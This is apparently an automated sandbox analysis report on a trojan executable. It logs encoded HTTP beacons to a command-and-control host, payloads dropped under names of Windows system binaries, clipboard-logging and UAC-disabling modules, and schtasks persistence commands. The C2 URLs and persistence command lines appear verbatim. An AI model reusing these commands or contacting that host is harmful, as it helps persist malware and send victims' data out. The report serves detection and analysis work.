Vbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: phoeni13.beget.tech

Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002E07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://phoeni13.beget.tech
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://phoeni13.beget.tech/
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://phoeni13.beget.tech/19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.0000000003043000.00000004.00000800.00020000.00000000.sdmp, MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.jmBb9uY1B8.exe.3184138.8.raw.unpack, type: UNPACKEDPE

Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen

Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\twain_32\SgrmBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\twain_32\SgrmBroker.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\twain_32\91e168f4ec1147	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\PLA\Templates\0b15d056fd0733	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\IME\IMETC\HELP\0b15d056fd0733	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File created: C:\Windows\Panther\setup.exe\0b15d056fd0733	Jump to behavior

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Code function: 0_2_00007FFD9B7E35A5	0_2_00007FFD9B7E35A5
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9B7D35A5	31_2_00007FFD9B7D35A5
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9BA82B30	31_2_00007FFD9BA82B30
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9BA82B38	31_2_00007FFD9BA82B38
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9BA8E09A	31_2_00007FFD9BA8E09A
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9BA8E89F	31_2_00007FFD9BA8E89F
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9BA83857	31_2_00007FFD9BA83857
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9BA8B638	31_2_00007FFD9BA8B638
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9BA81490	31_2_00007FFD9BA81490
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9BA98416	31_2_00007FFD9BA98416
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9BA82CC0	31_2_00007FFD9BA82CC0
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Code function: 31_2_00007FFD9BA9743D	31_2_00007FFD9BA9743D
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Code function: 32_2_00007FFD9B7D35A5	32_2_00007FFD9B7D35A5
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Code function: 33_2_00007FFD9B7F35A5	33_2_00007FFD9B7F35A5
Source: C:\Recovery\RuntimeBroker.exe	Code function: 34_2_00007FFD9B7E35A5	34_2_00007FFD9B7E35A5
Source: C:\Recovery\RuntimeBroker.exe	Code function: 35_2_00007FFD9B7E35A5	35_2_00007FFD9B7E35A5
Source: C:\Windows\twain_32\SgrmBroker.exe	Code function: 36_2_00007FFD9B8035A5	36_2_00007FFD9B8035A5
Source: C:\Windows\twain_32\SgrmBroker.exe	Code function: 37_2_00007FFD9B7D35A5	37_2_00007FFD9B7D35A5
Source: C:\ProgramData\sihost.exe	Code function: 38_2_00007FFD9B7E35A5	38_2_00007FFD9B7E35A5
Source: C:\ProgramData\sihost.exe	Code function: 39_2_00007FFD9B7E35A5	39_2_00007FFD9B7E35A5

Source: jmBb9uY1B8.exe	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: MwDxnowBVCiAiIllnkPs.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: StartMenuExperienceHost.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: MwDxnowBVCiAiIllnkPs.exe0.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: sihost.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.000000000321E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.00000000032BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUSBSpread.dll4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.00000000032BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730322760.0000000002EC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameClipboardLogger.dclib4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.0000000003262000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePerformanceCounter.dclib4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.00000000030B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1752290209.000000001B900000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1765839786.000000001C1C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1735799473.0000000013476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.0000000003239000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1765919326.000000001C1D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameUSBSpread.dll4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1752627730.000000001B910000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamePerformanceCounter.dclib4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.00000000031AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.00000000031AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClipboardLogger.dclib4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000000.1671706745.0000000000CB8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1752211894.000000001B8E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730232395.0000000002E90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1752242497.000000001B8F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1765444425.000000001C1B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystemRestorePointsCleaner.dclib4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730274091.0000000002EA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.000000000328B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.000000000328B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystemRestorePointsCleaner.dclib4 vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1752156414.000000001B8D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1765299897.000000001C1A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1730523212.00000000031F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1752091776.000000001B8B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe, 00000000.00000002.1765981784.000000001C1E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs jmBb9uY1B8.exe
Source: jmBb9uY1B8.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs jmBb9uY1B8.exe

Source: jmBb9uY1B8.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.jmBb9uY1B8.exe.3184138.8.raw.unpack, type: UNPACKEDPE

Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names

Source: jmBb9uY1B8.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MwDxnowBVCiAiIllnkPs.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: StartMenuExperienceHost.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MwDxnowBVCiAiIllnkPs.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sihost.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: jmBb9uY1B8.exe, TUdwbVPb85viGJCNu0q.cs	Cryptographic APIs: 'TransformBlock'
Source: jmBb9uY1B8.exe, TUdwbVPb85viGJCNu0q.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: jmBb9uY1B8.exe, HfWaKmaRxUDg34apENZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: jmBb9uY1B8.exe, HfWaKmaRxUDg34apENZ.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@38/32@1/1

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

File created: C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Jump to behavior

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

File created: C:\Users\All Users\sihost.exe

Jump to behavior

Source: C:\ProgramData\sihost.exe	Mutant created: NULL
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\bbea82d3e9aa77b77e7e78244764cf47c722e58f

Source: jmBb9uY1B8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: jmBb9uY1B8.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: jmBb9uY1B8.exe	Virustotal: Detection: 76%
Source: jmBb9uY1B8.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

File read: C:\Users\user\Desktop\jmBb9uY1B8.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jmBb9uY1B8.exe "C:\Users\user\Desktop\jmBb9uY1B8.exe"
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 7 /tr "'C:\Windows\twain_32\SgrmBroker.exe'" /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\Windows\twain_32\SgrmBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\SgrmBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\sihost.exe'" /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\All Users\sihost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\sihost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 12 /tr "'C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe'" /f
